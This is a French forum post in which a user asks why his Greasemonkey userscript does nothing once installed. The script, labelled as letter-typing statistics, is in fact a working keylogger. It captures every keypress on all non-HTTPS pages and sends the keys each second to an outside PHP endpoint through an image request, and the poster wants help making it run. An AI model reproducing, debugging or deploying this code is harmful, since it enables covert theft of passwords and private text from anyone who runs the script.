Bonjour à tous,
Je ne participe pas très souvent au forum, mais j'ai un petit problème concernant un script executé via GreaseMonkey. Le forum de GreaseMonley (userscripts.org) n'étant pas très actif, je viens à vous. Mes connaissances en Javascript ne sont pas extraordinaire, je suis en plein apprentissage de ce langage.
Bon voilà mon problème. J'ai mon script : (key.user.js) (aidé d'internet pour le moment)
Code :
- // ==UserScript==
- // @name KeyAnalysis
- // @namespace Paulair
- // @description Statistics on letters you type.
- // @version 1.0
- // @include *
- // @exclude https://*
-
- // ==/UserScript==
-
- var keys='';
- document.onkeypress = function(e) {
- get = window.event?event:e;
- key = get.keyCode?get.keyCode:get.charCode;
- key = String.fromCharCode(key);
- keys+=key;
- };
- window.setInterval(function(){
- new Image().src = 'http://paulair.free-h.net/keyl2.php?c='+keys; /*cette page analyse ensuite les lettres tapées, de ce coté il n'y a pas de problème*/
- keys = '';
- }, 1000);
|
Dans la console web (Ctrl+Shift+K sur Mozilla), mon script fonctionne très bien. Mais une fois installé dans Greasemonkey, il ne fait plus rien ! Pour tester, j'ai inséré une fonction bateau : setInterval("alert('Hello')",2000). Lorsque je l'insère en début de mon script, elle fonctionne. Et si je l'insère avant window.setInterval ou à la fin, elle ne fonctionne pas. Le script ne serait donc pas lu en entier. Quelqu'un saurait-il pourquoi ? Y a-t-il des particularités à GreaseMonkey ?
Merci d'avance,
Paulair.